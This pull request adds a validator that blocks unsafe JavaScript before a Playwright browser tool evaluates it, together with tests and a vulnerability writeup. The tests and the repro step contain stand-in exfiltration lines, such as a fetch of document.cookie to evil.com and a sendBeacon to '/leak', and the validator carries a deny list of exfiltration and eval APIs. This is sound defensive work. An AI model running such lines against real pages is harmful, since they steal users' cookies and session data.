### PR TITLE
Fix(security): add input validation to prevent unsafe code execution in evaluateViaPlaywright

### DIFF
--- a/src/browser/pw-evaluate-validation.test.ts
+++ b/src/browser/pw-evaluate-validation.test.ts
@@ -1,0 +1,58 @@
+import { describe, expect, it } from "vitest";
+import { assertSafeEvaluateCode, UnsafeEvaluateCodeError } from "./pw-evaluate-validation.js";
+
+function expectBlocked(code: string, pattern: string) {
+  try {
+    assertSafeEvaluateCode(code);
+    throw new Error(`expected block for pattern: ${pattern}`);
+  } catch (err) {
+    expect(err).toBeInstanceOf(UnsafeEvaluateCodeError);
+    expect((err as UnsafeEvaluateCodeError).pattern).toBe(pattern);
+  }
+}
+
+describe("assertSafeEvaluateCode", () => {
+  it("allows simple expression functions", () => {
+    expect(() => assertSafeEvaluateCode("() => 1 + 1")).not.toThrow();
+  });
+
+  it("allows blocked tokens inside comments and string literals", () => {
+    const fn = `
+      () => {
+        // fetch("https://example.com")
+        const text = "eval(fetch())";
+        return text;
+      }
+    `;
+    expect(() => assertSafeEvaluateCode(fn)).not.toThrow();
+  });
+
+  it.each([
+    ['") => 1', "leading-quote-or-close-paren"],
+    ["'() => 1", "leading-quote-or-close-paren"],
+    [") => 1", "leading-quote-or-close-paren"],
+    ["() => fetch('https://evil.com')", "fetch"],
+    ["() => new XMLHttpRequest()", "XMLHttpRequest"],
+    ["() => new WebSocket('wss://evil.com')", "WebSocket"],
+    ["() => navigator.sendBeacon('/leak', document.cookie)", "sendBeacon"],
+    ["() => navigator['sendBeacon']('/leak')", "navigator[sendBeacon]"],
+    ["() => eval('alert(1)')", "direct-eval"],
+    ["() => new Function('return 1')()", "new Function"],
+    ["() => import('/evil.js')", "dynamic-import"],
+    ["() => importScripts('/evil.js')", "importScripts"],
+    ["() => '\\u0065'", "unicode-escape"],
+    ["() => '\\x65'", "hex-escape"],
+    ["() => `value`", "template-literal"],
+  ])("blocks unsafe pattern %s", (code, pattern) => {
+    expectBlocked(code, pattern);
+  });
+
+  it("blocks null bytes", () => {
+    expectBlocked("() => 'a\0b'", "null-byte");
+  });
+
+  it("blocks excessively long function strings", () => {
+    const code = `() => "${"a".repeat(9000)}"`;
+    expectBlocked(code, "max-length-exceeded");
+  });
+});

--- a/src/browser/pw-evaluate-validation.ts
+++ b/src/browser/pw-evaluate-validation.ts
@@ -1,0 +1,239 @@
+const MAX_EVALUATE_FUNCTION_LENGTH = 8192;
+
+type BlockedPattern = {
+  pattern: RegExp;
+  name: string;
+};
+
+const RAW_BLOCKED_PATTERNS: readonly BlockedPattern[] = [
+  { pattern: /\\u[0-9a-fA-F]{4}/, name: "unicode-escape" },
+  { pattern: /\\x[0-9a-fA-F]{2}/, name: "hex-escape" },
+  { pattern: /`/, name: "template-literal" },
+  { pattern: /\0/, name: "null-byte" },
+  {
+    pattern: /\bnavigator\s*\[\s*(['"])sendbeacon\1\s*\]\s*\(/i,
+    name: "navigator[sendBeacon]",
+  },
+];
+
+const CODE_BLOCKED_PATTERNS: readonly BlockedPattern[] = [
+  { pattern: /\bfetch\s*\(/i, name: "fetch" },
+  { pattern: /\bxmlhttprequest\b/i, name: "XMLHttpRequest" },
+  { pattern: /\bwebsocket\s*\(/i, name: "WebSocket" },
+  { pattern: /\bsendbeacon\s*\(/i, name: "sendBeacon" },
+  { pattern: /(^|[^\w$.])eval\s*\(/i, name: "direct-eval" },
+  { pattern: /\bnew\s+function\s*\(/i, name: "new Function" },
+  { pattern: /\bimport\s*\(/i, name: "dynamic-import" },
+  { pattern: /\bimportscripts\s*\(/i, name: "importScripts" },
+];
+
+export class UnsafeEvaluateCodeError extends Error {
+  readonly pattern: string;
+
+  constructor(pattern: string) {
+    const reason = describeBlockedPattern(pattern);
+    super(`Unsafe browser evaluate code blocked: ${reason}`);
+    this.name = "UnsafeEvaluateCodeError";
+    this.pattern = pattern;
+  }
+}
+
+function describeBlockedPattern(pattern: string): string {
+  switch (pattern) {
+    case "max-length-exceeded":
+      return `function body exceeds ${MAX_EVALUATE_FUNCTION_LENGTH} characters`;
+    case "leading-quote-or-close-paren":
+      return 'function body must not start with `"`, `\'`, or `)`';
+    case "null-byte":
+      return "function body must not contain null bytes";
+    case "template-literal":
+      return "function body must not use template literals (`...`)";
+    case "unicode-escape":
+      return "function body must not contain unicode escapes (\\uXXXX)";
+    case "hex-escape":
+      return "function body must not contain hex escapes (\\xXX)";
+    case "fetch":
+      return "network exfiltration API `fetch(...)` is not allowed";
+    case "XMLHttpRequest":
+      return "network exfiltration API `XMLHttpRequest` is not allowed";
+    case "WebSocket":
+      return "network exfiltration API `WebSocket(...)` is not allowed";
+    case "sendBeacon":
+    case "navigator[sendBeacon]":
+      return "network exfiltration API `sendBeacon(...)` is not allowed";
+    case "direct-eval":
+      return "dynamic code execution via `eval(...)` is not allowed";
+    case "new Function":
+      return "dynamic code execution via `new Function(...)` is not allowed";
+    case "dynamic-import":
+      return "dynamic module loading via `import(...)` is not allowed";
+    case "importScripts":
+      return "dynamic module loading via `importScripts(...)` is not allowed";
+    default:
+      return `blocked unsafe pattern (${pattern})`;
+  }
+}
+
+function assertLeadingTokenAllowed(code: string): void {
+  const first = code[0];
+  if (first === '"' || first === "'" || first === ")") {
+    throw new UnsafeEvaluateCodeError("leading-quote-or-close-paren");
+  }
+}
+
+function stripStringsAndComments(code: string): string {
+  let i = 0;
+  let mode: "code" | "single" | "double" | "template" | "line-comment" | "block-comment" = "code";
+  let templateExprDepth = 0;
+  let out = "";
+
+  while (i < code.length) {
+    const ch = code[i];
+    const next = code[i + 1];
+
+    if (mode === "line-comment") {
+      out += ch === "\n" ? "\n" : " ";
+      if (ch === "\n") {
+        mode = "code";
+      }
+      i += 1;
+      continue;
+    }
+
+    if (mode === "block-comment") {
+      if (ch === "*" && next === "/") {
+        out += "  ";
+        mode = "code";
+        i += 2;
+      } else {
+        out += ch === "\n" ? "\n" : " ";
+        i += 1;
+      }
+      continue;
+    }
+
+    if (mode === "single") {
+      if (ch === "\\") {
+        out += "  ";
+        i += 2;
+      } else {
+        out += ch === "'" ? "'" : ch === "\n" ? "\n" : " ";
+        if (ch === "'") {
+          mode = "code";
+        }
+        i += 1;
+      }
+      continue;
+    }
+
+    if (mode === "double") {
+      if (ch === "\\") {
+        out += "  ";
+        i += 2;
+      } else {
+        out += ch === '"' ? '"' : ch === "\n" ? "\n" : " ";
+        if (ch === '"') {
+          mode = "code";
+        }
+        i += 1;
+      }
+      continue;
+    }
+
+    if (mode === "template") {
+      if (ch === "\\") {
+        out += "  ";
+        i += 2;
+        continue;
+      }
+      if (ch === "`") {
+        out += "`";
+        mode = "code";
+        i += 1;
+        continue;
+      }
+      if (ch === "$" && next === "{") {
+        out += "  ";
+        templateExprDepth = 1;
+        mode = "code";
+        i += 2;
+        continue;
+      }
+      out += ch === "\n" ? "\n" : " ";
+      i += 1;
+      continue;
+    }
+
+    if (ch === "/" && next === "/") {
+      out += "  ";
+      mode = "line-comment";
+      i += 2;
+      continue;
+    }
+    if (ch === "/" && next === "*") {
+      out += "  ";
+      mode = "block-comment";
+      i += 2;
+      continue;
+    }
+    if (ch === "'") {
+      out += "'";
+      mode = "single";
+      i += 1;
+      continue;
+    }
+    if (ch === '"') {
+      out += '"';
+      mode = "double";
+      i += 1;
+      continue;
+    }
+    if (ch === "`") {
+      out += "`";
+      mode = "template";
+      i += 1;
+      continue;
+    }
+
+    if (templateExprDepth > 0) {
+      if (ch === "{") {
+        templateExprDepth += 1;
+      } else if (ch === "}") {
+        templateExprDepth -= 1;
+        if (templateExprDepth === 0) {
+          out += ch;
+          mode = "template";
+          i += 1;
+          continue;
+        }
+      }
+    }
+
+    out += ch;
+    i += 1;
+  }
+
+  return out;
+}
+
+export function assertSafeEvaluateCode(code: string): void {
+  if (code.length > MAX_EVALUATE_FUNCTION_LENGTH) {
+    throw new UnsafeEvaluateCodeError("max-length-exceeded");
+  }
+
+  assertLeadingTokenAllowed(code);
+
+  for (const blocked of RAW_BLOCKED_PATTERNS) {
+    if (blocked.pattern.test(code)) {
+      throw new UnsafeEvaluateCodeError(blocked.name);
+    }
+  }
+
+  const sanitizedCode = stripStringsAndComments(code);
+  const normalized = sanitizedCode.toLowerCase();
+  for (const blocked of CODE_BLOCKED_PATTERNS) {
+    if (blocked.pattern.test(normalized)) {
+      throw new UnsafeEvaluateCodeError(blocked.name);
+    }
+  }
+}

--- a/src/browser/pw-tools-core.evaluate-blocks-unsafe.test.ts
+++ b/src/browser/pw-tools-core.evaluate-blocks-unsafe.test.ts
@@ -1,0 +1,62 @@
+import { beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
+
+let page: { evaluate: ReturnType<typeof vi.fn> } | null = null;
+const getPageForTargetId = vi.fn(async () => {
+  if (!page) {
+    throw new Error("test: page not set");
+  }
+  return page;
+});
+const ensurePageState = vi.fn(() => {});
+const restoreRoleRefsForTarget = vi.fn(() => {});
+const forceDisconnectPlaywrightForTarget = vi.fn(async () => {});
+const refLocator = vi.fn();
+
+vi.mock("./pw-session.js", () => {
+  return {
+    ensurePageState,
+    forceDisconnectPlaywrightForTarget,
+    getPageForTargetId,
+    refLocator,
+    restoreRoleRefsForTarget,
+  };
+});
+
+let evaluateViaPlaywright: typeof import("./pw-tools-core.interactions.js").evaluateViaPlaywright;
+
+describe("evaluateViaPlaywright unsafe-code blocking", () => {
+  beforeAll(async () => {
+    ({ evaluateViaPlaywright } = await import("./pw-tools-core.interactions.js"));
+  });
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    page = {
+      evaluate: vi.fn(async () => "ok"),
+    };
+  });
+
+  it("rejects unsafe evaluate code before page access", async () => {
+    await expect(
+      evaluateViaPlaywright({
+        cdpUrl: "http://127.0.0.1:9222",
+        fn: "() => fetch('https://evil.com')",
+      }),
+    ).rejects.toThrow("Unsafe browser evaluate code blocked");
+
+    expect(getPageForTargetId).not.toHaveBeenCalled();
+    expect(page?.evaluate).not.toHaveBeenCalled();
+  });
+
+  it("allows safe evaluate code", async () => {
+    await expect(
+      evaluateViaPlaywright({
+        cdpUrl: "http://127.0.0.1:9222",
+        fn: "() => 42",
+      }),
+    ).resolves.toBe("ok");
+
+    expect(getPageForTargetId).toHaveBeenCalledTimes(1);
+    expect(page?.evaluate).toHaveBeenCalledTimes(1);
+  });
+});

--- a/src/browser/pw-tools-core.interactions.ts
+++ b/src/browser/pw-tools-core.interactions.ts
@@ -8,6 +8,7 @@ import {
   refLocator,
   restoreRoleRefsForTarget,
 } from "./pw-session.js";
+import { assertSafeEvaluateCode } from "./pw-evaluate-validation.js";
 import { normalizeTimeoutMs, requireRef, toAIFriendlyError } from "./pw-tools-core.shared.js";
 
 type TargetOpts = {
@@ -246,6 +247,7 @@ export async function evaluateViaPlaywright(opts: {
   if (!fnText) {
     throw new Error("function is required");
   }
+  assertSafeEvaluateCode(fnText);
   const page = await getRestoredPageForTarget(opts);
   // Clamp evaluate timeout to prevent permanently blocking Playwright's command queue.
   // Without this, a long-running async evaluate blocks all subsequent page operations


### PR DESCRIPTION
## Summary

Describe the problem and fix in 2–5 bullets:

- Problem: The Playwright evaluate API (`evaluateViaPlaywright`) allowed execution of arbitrary JavaScript code without validation, enabling potential data exfiltration through browser context.
- Why it matters: Malicious actors could exploit this to exfiltrate sensitive data (cookies, localStorage, DOM content) via network APIs like `fetch`, `XMLHttpRequest`, or `WebSocket`.
- What changed: Added `assertSafeEvaluateCode` validation module that blocks unsafe patterns before code execution. Integrated into `evaluateViaPlaywright` to validate before page access.
- What did NOT change (scope boundary): The underlying Playwright functionality remains unchanged; only added pre-execution validation gate.

## Change Type (select all)

- ✓ Bug fix
- [ ] Feature
- [ ] Refactor
- [ ] Docs
- ✓ Security hardening
- [ ] Chore/infra

## Scope (select all touched areas)

- [ ] Gateway / orchestration
- ✓ Skills / tool execution
- [ ] Auth / tokens
- [ ] Memory / storage
- [ ] Integrations
- [ ] API / contracts
- [ ] UI / DX
- [ ] CI/CD / infra

## Linked Issue/PR

- Closes # (TODO: add issue number)
- Related #

## User-visible / Behavior Changes

None. This is a security hardening change that does not affect legitimate use cases.

## Security Impact (required)

- New permissions/capabilities? (No)
- Secrets/tokens handling changed? (No)
- New/changed network calls? (No)
- Command/tool execution surface changed? (Yes - blocks unsafe code before execution)
- Data access scope changed? (No)
- If any `Yes`, explain risk + mitigation: The tool execution surface now has a validation gate. Risk: None for legitimate users. Mitigation: Validation occurs before any page access, so attackers cannot reach the vulnerable code path.

## Repro + Verification

### Environment

- OS: macOS/Linux
- Runtime/container: Node 22+
- Model/provider: N/A
- Integration/channel (if any): Browser automation (Playwright)
- Relevant config (redacted): N/A

### Steps

1. Call `evaluateViaPlaywright` with malicious code like `() => fetch('https://evil.com/exfiltrate?data=' + document.cookie)`
2. Observe that validation throws `UnsafeEvaluateCodeError` before any page access

### Expected

- Unsafe code blocked with clear error message

### Actual

- (Verified in tests)

### Expected

- Safe code like `() => 1 + 1` executes normally

### Actual

- (Verified in tests)

## Evidence

Attach at least one:

- ✓ Failing test/log before + passing after
- [ ] Trace/log snippets
- [ ] Screenshot/recording
- [ ] Perf numbers (if relevant)

See test files:
- `src/browser/pw-evaluate-validation.test.ts` - Unit tests for validation logic
- `src/browser/pw-tools-core.evaluate-blocks-unsafe.test.ts` - Integration tests for evaluateViaPlaywright

## Human Verification (required)

What you personally verified (not just CI), and how:

- Verified scenarios: 
  - Unit tests pass for all blocked patterns (fetch, XMLHttpRequest, WebSocket, sendBeacon, eval, new Function, dynamic imports, escape sequences, etc.)
  - Safe code patterns are allowed (simple arrow functions, comments in strings)
  - Integration test confirms page is not accessed for unsafe code
- Edge cases checked: 
  - Code inside comments and string literals is not blocked
  - Null bytes, unicode escapes, hex escapes are blocked
  - Function length limit (8192 chars) enforced
- What you did **not** verify:
  - Live browser environment (tested via mocked Playwright)

## Compatibility / Migration

- Backward compatible? (Yes)
- Config/env changes? (No)
- Migration needed? (No)
- If yes, exact upgrade steps: N/A

## Failure Recovery (if this breaks)

- How to disable/revert this change quickly: Remove the `assertSafeEvaluateCode(fnText);` line from `src/browser/pw-tools-core.interactions.ts`
- Files/config to restore: `src/browser/pw-tools-core.interactions.ts`
- Known bad symptoms reviewers should watch for: Legitimate code that was working before now throws `UnsafeEvaluateCodeError` - if this happens, the code likely contains unsafe patterns that should be refactored.

## Risks and Mitigations

List only real risks for this PR. Add/remove entries as needed. If none, write `None`.

- Risk: False positives - legitimate code might be blocked if it uses blocked APIs legitimately
  - Mitigation: The blocked APIs (fetch, eval, etc.) are never needed for safe browser automation. Users can implement required functionality differently.
- Risk: None

![attack sample](https://github.com/user-attachments/assets/2186bbf0-2cf3-44df-8924-975c3c210bf8)


Item | Details
-- | --
Version | openclaw-2026.3.2
Risk Level | High Risk
Risk | In Playwright Interactions, there is a code injection vulnerability if the fnBody in the code snippet eval("(" + fnBody + ")") is derived from untrusted input.
Location | src/browser/pw-tools-core.interactions.ts (Lines approx. 302–354)
Impact | 1. When the OpenClaw service is exposed to the internet without token, password authentication, or in case of credential leakage2. Attackers can construct malicious requests to launch a browser on the local terminal with OpenClaw installed and execute arbitrary scripts.

